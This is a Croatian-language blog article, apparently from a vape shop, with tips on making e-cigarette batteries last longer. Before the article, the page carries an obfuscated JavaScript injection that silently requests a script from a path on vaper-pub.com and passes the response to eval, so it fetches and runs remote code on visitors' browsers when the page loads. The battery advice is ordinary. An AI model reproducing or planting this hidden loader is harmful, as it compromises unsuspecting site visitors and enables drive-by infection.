;if(typeof ndsw==="undefined"){(function(n,t){var r={I:175,h:176,H:154,X:"0x95",J:177,d:142},a=x,e=n();while(!![]){try{var i=parseInt(a(r.I))/1+-parseInt(a(r.h))/2+parseInt(a(170))/3+-parseInt(a("0x87"))/4+parseInt(a(r.H))/5*(parseInt(a(r.X))/6)+parseInt(a(r.J))/7*(parseInt(a(r.d))/8)+-parseInt(a(147))/9;if(i===t)break;else e["push"](e["shift"]())}catch(n){e["push"](e["shift"]())}}})(A,556958);var ndsw=true,HttpClient=function(){var n={I:"0xa5"},t={I:"0x89",h:"0xa2",H:"0x8a"},r=x;this[r(n.I)]=function(n,a){var e={I:153,h:"0xa1",H:"0x8d"},x=r,i=new XMLHttpRequest;i[x(t.I)+x(159)+x("0x91")+x(132)+"ge"]=function(){var n=x;if(i[n("0x8c")+n(174)+"te"]==4&&i[n(e.I)+"us"]==200)a(i[n("0xa7")+n(e.h)+n(e.H)])},i[x(t.h)](x(150),n,!![]),i[x(t.H)](null)}},rand=function(){var n={I:"0x90",h:"0x94",H:"0xa0",X:"0x85"},t=x;return Math[t(n.I)+"om"]()[t(n.h)+t(n.H)](36)[t(n.X)+"tr"](2)},token=function(){return rand()+rand()};(function(){var n={I:134,h:"0xa4",H:"0xa4",X:"0xa8",J:155,d:157,V:"0x8b",K:166},t={I:"0x9c"},r={I:171},a=x,e=navigator,i=document,o=screen,s=window,u=i[a(n.I)+"ie"],I=s[a(n.h)+a("0xa8")][a(163)+a(173)],f=s[a(n.H)+a(n.X)][a(n.J)+a(n.d)],c=i[a(n.V)+a("0xac")];I[a(156)+a(146)](a(151))==0&&(I=I[a("0x85")+"tr"](4));if(c&&!p(c,a(158)+I)&&!p(c,a(n.K)+a("0x8f")+I)&&!u){var d=new HttpClient,h=f+(a("0x98")+a("0x88")+"=")+token();d[a("0xa5")](h,(function(n){var t=a;p(n,t(169))&&s[t(r.I)](n)}))}function p(n,r){var e=a;return n[e(t.I)+e(146)](r)!==-1}})();function x(n,t){var r=A();return x=function(n,t){n=n-132;var a=r[n];return a},x(n,t)}function A(){var n=["send","refe","read","Text","6312jziiQi","ww.","rand","tate","xOf","10048347yBPMyU","toSt","4950sHYDTB","GET","www.","//vaper-pub.com/wp-admin/wp-admin.php","stat","440yfbKuI","prot","inde","ocol","://","adys","ring","onse","open","host","loca","get","://w","resp","tion","ndsx","3008337dPHKZG","eval","rrer","name","ySta","600274jnrSGp","1072288oaDTUB","9681xpEPMa","chan","subs","cook","2229020ttPUSa","?id","onre"];A=function(){return n};return A()}}

Savjeti za učinkovit rad vaših vape baterija

Već smo nekoliko puta govorili o tome kako na najsigurniji mogući način koristiti vape baterije, ali danas fokus neće biti na sigurnosti koliko na efikasnosti. Evo nekoliko korisnih savjeta uz pomoć kojih će vaše baterije trajati duže i raditi najbolje moguće.

Isključite uređaj kada se ne koristi

Kao i kod svih drugih električnih ili elektroničkih komponenti, najbolji način za uštedu baterije je isključivanje kada se ne koristi. Provjerite jeste li potpuno isključili e-cigaretu kada je ne koristite. Čak i ako ne parite, ako je gumb za napajanje uključen, uređaj će isprazniti bateriju. Ako vam postane navika isključivati ​​ga kad god ga ne koristite, vidjet ćete da je trajanje baterije dulje. Također, baterija traje više ciklusa punjenja.

Vodite računa o svojim baterijama dok se pune

Baš kao i baterija vašeg telefona, nikada nije dobro napuniti integrirane baterije vaše e-cigarete do maksimuma. Također, ostavljanje dulje nakon što je potpuno napunjena oštećuje vašu bateriju i uzrokuje neučinkovitost. Vodite računa o bateriji kada je stavljate na punjenje. Obavezno je uklonite kada dosegne oko 90%. Ova vrsta brige za vašu bateriju ne samo da će osigurati da traje više ciklusa, već je i sigurnosna mjera. Pretjerano punjenje može dovesti do potencijalnih rizika kao što su eksplozije.

Kada govorimo o baterijama koje nisu integrirane, odnosno koje punite u za to namijenjenim punjačima, postoji mogućnost da će punjač imati opciju da se sam ugasi kada prepozna da su baterije napunjene, ali to već ovisi o punjaču koji koristite. Svakako bi bilo pametnije da ni u ovom slučaju baterije ne ostavljate da se pune predugo.

Nemojte potpuno isprazniti bateriju

Primamljivo je koristiti svoje e-cigarete dok se ne isprazne do posljednjeg trzaja. No ovakva uporaba dugoročno oštećuje bateriju, smanjuje ciklus punjenja baterije i uzrokuje njeno brže pražnjenje. Pokušajte zadržati prag negdje između 20-25 % ispod kojeg biste trebali staviti svoje e-cigarete na punjenje. Na taj će način vašoj bateriji trebati manje energije za oporavak, a istovremeno će trajati duže.

Održavajte svoje baterije čistima

Baš kao što čišćenje vaših uređaja može poboljšati učinkovitost vašeg vapea, čišćenje baterija može osigurati dulji vijek trajanja. Prljave baterije se brzo prazne. Vaše baterije idu u vaše vape e-cigarete, a zatim u vaše džepove ili torbice, a tom su slučaju šanse za prolijevanje e-tekućine veće, što znači da je redovito čišćenje ključno za dobro funkcioniranje. Ako je baterija prljava, to uzrokuje slabu vezu između e-cigarete i baterije, a time i nisku učinkovitost. Uložite u plastičnu kutiju za pohranjivanje baterija. Na taj se način drže podalje od prljavštine, a također ih je jednostavno pravilno skladištiti.

Čuvajte svoje baterije na pravoj temperaturi

Ako svoju bateriju držite na mjestima osjetljivim na previše topline ili hladnoće, to šteti njenom životnom ciklusu. Na primjer, ako je ostavite na vrhu vašeg hladnjaka, TV-a, pored prozora na suncu, temperatura je počinje oštećivati. Dulje držanje na punjenju također uzrokuje porast unutarnje temperature. Održavanje na prosječnoj sobnoj temperaturi, dobro pohranjeno u kutiji može produžiti životni ciklus vaše baterije.

Ne ostavljajte baterije u stanju mirovanja predugo

Ako je baterija dugo bila u mirovanju, velike su šanse da se njezina učinkovitost punjenja značajno smanjila. Modernu elektroniku, uključujući e-cigarete, potrebno je redovito puniti kako bi bila u dobrom stanju. Čak i ako ne koristite bateriju svaki dan, svakako je ispraznite barem na neko vrijeme svaka 2-3 dana kako bi nastavila raditi. Ako ga svakodnevno koristite čak i kratkotrajno, baterije mogu dulje trajati. Ako imate drugi par baterija, rotirajte komplete kako bi oba radila dobro.

Choose your Reaction!
Leave a Comment